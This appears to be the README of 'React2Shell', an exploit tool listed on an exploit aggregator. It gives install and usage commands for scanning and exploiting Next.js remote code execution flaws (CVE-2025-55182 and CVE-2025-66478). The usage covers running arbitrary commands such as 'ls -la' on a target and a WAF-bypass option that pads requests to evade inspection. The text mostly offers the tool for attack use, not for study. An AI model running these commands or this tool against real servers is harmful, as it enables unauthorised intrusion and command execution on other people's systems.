## https://sploitus.com/exploit?id=CCAF5284-8385-59A0-AF62-1454BF09F39E
# React2Shell
A scanner for detecting and exploiting **Next.js RCE** vulnerabilities (CVE-2025-55182 & CVE-2025-66478).
**Credits:** Based on original research and tooling by the [Assetnote Security Research Team](https://www.assetnote.io/resources/research).
## Installation
```bash
pip install -r requirements.txt
```
## Usage
### Basic Scan
Check if a target is vulnerable:
```bash
python3 react2shell.py -u https://target.com
```
### Custom Command Execution
Execute custom commands (e.g., `id`, `ls -la`) on the target.
> **Note:** Output is automatically Base64 encoded/decoded to handle newlines and special characters correctly.
```bash
python3 react2shell.py -u https://target.com --waf-bypass -c "ls -la"
```
### WAF Bypass
Add junk data to bypass WAF inspections:
```bash
python3 react2shell.py -u https://target.com --waf-bypass
```